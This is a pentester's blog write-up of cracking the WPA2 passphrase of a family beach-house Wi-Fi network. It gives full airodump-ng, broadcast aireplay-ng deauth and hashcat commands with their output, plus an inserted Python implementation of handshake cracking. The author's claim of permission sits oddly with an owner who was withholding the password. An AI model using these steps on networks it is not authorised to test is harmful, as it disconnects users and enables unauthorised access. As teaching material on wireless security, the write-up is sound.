Hashcat WPA2 Cracking – Beach Edition

As a perfect follow-up to our Wireless CTF win, I present some hashcat WPA2 cracking.

The Challenge

I headed to the beach right after DEF CON, to spend some time with Hacker’s Girlfriend and her family.

My first day there the girlfriend told me, “If you don’t come to the beach with me, then I won’t give you the Wi-Fi password.” Unfortunately, there were two problems with this scenario. The first was that I had plenty of books, beer, and 4G signal to keep myself busy for a few days. The second, and most important, as I explained to her, was that I had just recently come back from winning a wireless hacking competition at DEF CON.

I still went down to the beach with her, but I decided to prove my point a bit later.

Finding the Network

Shortly after dinner, she went off shopping, so I got to work.

First, I made sure that I connected and properly configured my wireless card.

root@kali32:~# iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Then, I needed to find the network. This was easy enough with airodump-ng, as it was the AP with the strongest signal (the PWR column closest to zero).

root@kali32:~# airodump-ng wlan0
 CH 10 ][ Elapsed: 18 s ][ 2017-08-01 21:15                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:25:xx:xx:xx:xx   -1        0        0    0  -1  -1                           
 00:23:xx:xx:xx:xx  -48       27      254    0  11  54e  WPA2 CCMP   PSK  beachbreeze       
 00:1D:xx:xx:xx:xx  -64       31        3    0  11  54e  WPA2 CCMP   PSK  xxxxxxxx       

Capturing the Traffic

Next, I needed to capture and log the traffic to this AP.

The first thing I did was place my interface into monitor mode.

root@kali32:~# airmon-ng start wlan0 11

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  328 NetworkManager
  767 wpa_supplicant

PHY    Interface    Driver        Chipset

phy0    wlan0        ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

        (mac80211 monitor mode already enabled for [phy0]wlan0 on [phy0]11)

Then, I pointed airodump-ng at the target BSSID on channel 11 and began saving the capture with the prefix wpa-breeze (airodump-ng appends a sequence number, which is why the file is wpa-breeze-01.cap below).

root@kali32:~# airodump-ng --bssid 00:23:xx:xx:xx:xx -c 11 --write wpa-breeze wlan0


I figured it would be simple enough to capture a handshake, since the kids (and adults) needed their Wi-Fi, and every reconnecting client performs a fresh 4-way handshake.

In this case, since I wasn’t worried about a short outage, I decided to just send 25 broadcast deauths to speed things along. As aireplay-ng itself points out below, targeting a specific connected client with -c is more reliable than broadcast, and clients that negotiate 802.11w Protected Management Frames ignore unprotected deauthentication frames altogether.

root@kali32:~# aireplay-ng --deauth 25 -a 00:23:xx:xx:xx:xx wlan0
21:23:24  Waiting for beacon frame (BSSID: 00:23:xx:xx:xx:xx) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c ).
21:23:24  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]
21:23:25  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]
21:23:25  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]

As a result, I was able to quickly capture a new WPA handshake.

 CH 11 ][ Elapsed: 4 mins ][ 2017-08-01 21:27 ][ WPA handshake: 00:23:xx:xx:xx:xx       

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:23:xx:xx:xx:xx  -44  92     2506    72556   76  11  54e  WPA2 CCMP   PSK  beachbreeze 

File Conversion

For those of you unfamiliar, hashcat WPA2 cracking (mode 2500, as used here) requires .hccapx files rather than raw pcap captures: each 393-byte hccapx record carries just the ESSID, the two MAC addresses, the two nonces, the EAPOL frame and its MIC, which is all hashcat needs to verify a candidate passphrase.

In this case, I needed to convert my .cap to a .hccapx so that I could crack it using hashcat. Note that hashcat 6.0 and later deprecate mode 2500 and cap2hccapx in favour of mode 22000, which reads a .hc22000 file produced by hcxpcapngtool from the hcxtools project; the steps below reflect the 2017 toolchain.

First, I downloaded the hashcat-utils.

Rays-MacBook-Pro:tools doyler$ git clone https://github.com/hashcat/hashcat-utils
Cloning into 'hashcat-utils'...
remote: Counting objects: 391, done.
remote: Total 391 (delta 0), reused 0 (delta 0), pack-reused 391
Receiving objects: 100% (391/391), 110.78 KiB | 106.00 KiB/s, done.
Resolving deltas: 100% (250/250), done.

Next, I built all the utils in the src directory.

Rays-MacBook-Pro:src doyler$ pwd
Rays-MacBook-Pro:src doyler$ make
rm -f ../bin/*
rm -f *.bin *.exe
cc -Wall -W -pipe -O2 -std=gnu99  -o cap2hccapx.bin cap2hccapx.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cleanup-rules.bin cleanup-rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combinator.bin combinator.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combinator3.bin combinator3.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combipow.bin combipow.c
cc -Wall -W -pipe -O2 -std=gnu99  -o ct3_to_ntlm.bin ct3_to_ntlm.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cutb.bin cutb.c
cc -Wall -W -pipe -O2 -std=gnu99  -o expander.bin expander.c
cc -Wall -W -pipe -O2 -std=gnu99  -o gate.bin gate.c
cc -Wall -W -pipe -O2 -std=gnu99  -o generate-rules.bin generate-rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o hcstatgen.bin hcstatgen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o hcstat2gen.bin hcstat2gen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o keyspace.bin keyspace.c
cc -Wall -W -pipe -O2 -std=gnu99  -o len.bin len.c
cc -Wall -W -pipe -O2 -std=gnu99  -o mli2.bin mli2.c
cc -Wall -W -pipe -O2 -std=gnu99  -o morph.bin morph.c
cc -Wall -W -pipe -O2 -std=gnu99  -o permute.bin permute.c
cc -Wall -W -pipe -O2 -std=gnu99  -o permute_exist.bin permute_exist.c
cc -Wall -W -pipe -O2 -std=gnu99  -o prepare.bin prepare.c
cc -Wall -W -pipe -O2 -std=gnu99  -o req-include.bin req-include.c
cc -Wall -W -pipe -O2 -std=gnu99  -o req-exclude.bin req-exclude.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rli.bin rli.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rli2.bin rli2.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rules_optimize.bin rules_optimize.c cpu_rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o splitlen.bin splitlen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsr.bin strip-bsr.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsn.bin strip-bsn.c

Finally, I used cap2hccapx to convert the .cap file to a .hccapx file.

Rays-MacBook-Pro:src doyler$ ./cap2hccapx.bin ~/Documents/_CTFs_/wpa/wpa-breeze-01.cap ~/Documents/_CTFs_/wpa/breeze.hccapx
Networks detected: 1

[*] BSSID=00:23:xx:xx:xx:xx ESSID=beachbreeze (Length: 11)
 --> STA=4c:66:xx:xx:xx:xx, Message Pair=0, Replay Counter=0
 --> STA=4c:66:xx:xx:xx:xx, Message Pair=2, Replay Counter=0
 --> STA=c0:18:xx:xx:xx:xx, Message Pair=2, Replay Counter=0

Written 3 WPA Handshakes to: /Users/doyler/Documents/_CTFs_/wpa/breeze.hccapx

Hashcat WPA2 Cracking

With the .hccapx file in hand, cracking it with hashcat was a breeze.

I used the following flags and options to actually perform the cracking.

  • -m 2500 = WPA/WPA2 hash mode (EAPOL MIC verification)
  • -r ~/tools/cracking/best64.rule = the best64 rule set, used to mangle each dictionary word into further candidates
  • -d 2,3 = telling hashcat to use only OpenCL devices 2 and 3 on my machine (the two GPUs, skipping my CPU)
  • breeze.hccapx = the .hccapx I was trying to crack
  • ~/tools/cracking/rockyou.txt = the location of my rockyou dictionary

Rays-MacBook-Pro:wpa doyler$ hashcat -m 2500 -r ~/tools/cracking/best64.rule -d 2,3 breeze.hccapx ~/tools/cracking/rockyou.txt
hashcat () starting...

OpenCL Platform #1: Apple
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 3 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD

Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104433792

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: breeze.hccapx
Time.Started.....: Wed Aug  2 19:51:57 2017 (4 secs)
Time.Estimated...: Thu Aug  3 00:47:28 2017 (4 hours, 55 mins)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     2713 H/s (7.96ms)
Speed.Dev.#3.....:    58856 H/s (8.08ms)
Speed.Dev.#*.....:    61549 H/s
Recovered........: 0/2 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 12866667/1104433792 (1.17%)
Rejected.........: 12686443/12866667 (98.60%)
Restore.Point....: 0/14343296 (0.00%)
Candidates.#2....: 123456789 -> 09876543210
Candidates.#3....: 20032003 -> ARCTICCAT


Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: breeze.hccapx
Time.Started.....: Wed Aug  2 19:51:57 2017 (5 secs)
Time.Estimated...: Wed Aug  2 19:52:02 2017 (0 secs)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     5192 H/s (8.00ms)
Speed.Dev.#3.....:    58907 H/s (8.08ms)
Speed.Dev.#*.....:    64099 H/s
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 12981355/1104433792 (1.18%)
Rejected.........: 12686443/12981355 (97.73%)
Restore.Point....: 0/14343296 (0.00%)
Candidates.#2....: 123456789 -> 09876543210
Candidates.#3....: 20032003 -> ARCTICCAT

Started: Wed Aug  2 19:51:52 2017
Stopped: Wed Aug  2 19:52:03 2017

Furthermore, once I had everything set up, it only took hashcat 11 seconds to crack the password, which was found within the first 1.2% of the keyspace. Two things in that output are worth noticing. The Rejected counter is above 97% because a WPA2-PSK passphrase must be 8 to 63 characters long, so hashcat discards every rockyou word or rule-mangled candidate outside that range before spending 4096 PBKDF2 iterations on it. The roughly 60 kH/s total speed is also the reason dictionaries and rules matter far more than raw hardware here: at that rate the full rockyou list alone would take a few minutes, but an exhaustive search of even eight lower-case characters would take decades.
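
To make the File Conversion and Hashcat WPA2 Cracking steps above concrete, here is an added example (my own code, not the author's and not hashcat's) that does in pure Python what cap2hccapx and hashcat -m 2500 do between them: it derives the PMK with PBKDF2-HMAC-SHA1, derives the KCK from the PTK, computes the EAPOL-Key MIC, packs and re-parses the handshake in hashcat's 393-byte hccapx v4 layout, and then runs a dictionary attack that rejects candidates outside the 8..63 character range exactly as hashcat's Rejected counter reflects. The ESSID beachbreeze is taken from the page; every MAC address, nonce, EAPOL frame, the passphrase sandcastle2017 and the wordlist are constructed for the demo and are not the real network's values.

```python
"""WPA2-PSK handshake cracking end to end: key derivation, hccapx pack/parse, MIC check.
Added example, not the author's or hashcat's code. All MACs, nonces, EAPOL bytes,
the passphrase and the wordlist below are constructed for the demo."""
import hashlib
import hmac
import struct

# hccapx v4 record as published by hashcat: 393 bytes, little-endian.
HCCAPX_FMT = "<4sIBB32sB16s6s32s6s32sH256s"


def pmk(passphrase: str, essid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    This is the expensive step that keeps WPA2 cracking at tens of kH/s per GPU."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def kck(pmk_: bytes, mac_ap: bytes, mac_sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key = first 128 bits of the PTK; MACs and nonces are ordered min||max."""
    data = (min(mac_ap, mac_sta) + max(mac_ap, mac_sta)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck_: bytes, keyver: int, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field (bytes 81..96) zeroed.
    keyver 1 = HMAC-MD5 (WPA/TKIP); keyver 2 = HMAC-SHA1 truncated to 128 bits (WPA2/CCMP)."""
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    digest = hashlib.md5 if keyver == 1 else hashlib.sha1
    return hmac.new(kck_, zeroed, digest).digest()[:16]


def build_eapol_m2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with a zeroed MIC placeholder.
    Key Information 0x010a = descriptor version 2, pairwise, MIC bit set; the key data
    field is left empty (a real frame carries the client's RSN IE there)."""
    body = (b"\x02"                          # descriptor type: RSN
            + b"\x01\x0a"                    # key information
            + b"\x00\x10"                    # key length (CCMP)
            + struct.pack(">Q", replay_counter)
            + snonce                         # 32-byte SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, key ID
            + b"\x00" * 16                   # MIC placeholder at offset 81
            + b"\x00\x00")                   # key data length
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # 802.1X v1, EAPOL-Key


def pack_hccapx(essid, keyver, keymic, mac_ap, anonce, mac_sta, snonce, eapol, message_pair=0):
    """Serialise one handshake into the record layout cap2hccapx emits."""
    return struct.pack(HCCAPX_FMT, b"HCPX", 4, message_pair, len(essid), essid,
                       keyver, keymic, mac_ap, anonce, mac_sta, snonce, len(eapol), eapol)


def unpack_hccapx(blob: bytes) -> dict:
    """Parse one hccapx record, checking signature and version as hashcat does."""
    (sig, ver, _mp, essid_len, essid, keyver, keymic,
     mac_ap, anonce, mac_sta, snonce, eapol_len, eapol) = struct.unpack(HCCAPX_FMT, blob)
    if sig != b"HCPX" or ver != 4:
        raise ValueError("not an hccapx v4 record")
    return dict(essid=essid[:essid_len], keyver=keyver, keymic=keymic, mac_ap=mac_ap,
                anonce=anonce, mac_sta=mac_sta, snonce=snonce, eapol=eapol[:eapol_len])


def crack(rec: dict, wordlist) -> tuple:
    """Dictionary attack: a candidate is the PSK when its recomputed MIC matches the captured one.
    Candidates outside 8..63 characters are rejected before hashing, which is why hashcat's
    Rejected counter is so high on a rockyou + rules run."""
    stats = {"tried": 0, "rejected": 0}
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:
            stats["rejected"] += 1
            continue
        stats["tried"] += 1
        k = kck(pmk(cand, rec["essid"]), rec["mac_ap"], rec["mac_sta"], rec["anonce"], rec["snonce"])
        if hmac.compare_digest(eapol_mic(k, rec["keyver"], rec["eapol"]), rec["keymic"]):
            return cand, stats
    return None, stats


def demo() -> tuple:
    """Build a handshake for a known (constructed) PSK, round-trip it through hccapx, crack it."""
    essid = b"beachbreeze"                                   # ESSID from the capture above
    mac_ap = bytes.fromhex("002300000001")                   # constructed, mimics 00:23:xx:xx:xx:xx
    mac_sta = bytes.fromhex("4c6600000002")                  # constructed, mimics 4c:66:xx:xx:xx:xx
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))  # constructed nonces
    secret = "sandcastle2017"                                # constructed PSK, not the real one
    eapol = build_eapol_m2(snonce)
    mic = eapol_mic(kck(pmk(secret, essid), mac_ap, mac_sta, anonce, snonce), 2, eapol)
    rec = unpack_hccapx(pack_hccapx(essid, 2, mic, mac_ap, anonce, mac_sta, snonce, eapol))
    wordlist = ["beach", "123456", "password1", "sunshine", secret]   # constructed
    return crack(rec, wordlist)


if __name__ == "__main__":
    print(demo())   # ('sandcastle2017', {'tried': 3, 'rejected': 2})
```

The pmk() function is the whole reason the attack runs at 60 kH/s rather than billions per second: every candidate costs 4096 HMAC-SHA1 iterations, and the ESSID acts as the salt, so precomputed tables only help against a specific network name. Everything after the PMK (the PRF, the KCK, the MIC) is cheap, which is also why hccapx and hc22000 records need only the nonces, MACs and EAPOL frame rather than the whole capture. The first two wordlist entries are never hashed at all; they are the same "Rejected" candidates hashcat reported above.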

Hashcat WPA2 Cracking – Conclusion

While this was a simpler network to get into, it was still a fun challenge, and it was a good way to show the same kind of challenge we faced during the wireless CTF. Note that this was a network I had permission to test because we were staying there. I do not recommend attacking networks that you do not own or control without explicit permission.

In the end, the password worked, and I was able to connect to the network!

[Screenshot: Hashcat WPA2 Cracking – Connected]

Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCP, eCPPT, eWPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration Testing Consultant for SecureWorks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next (OSCE?!) or side project to work on, he enjoys playing video games, traveling, and watching sports.

Filed under Security Not Included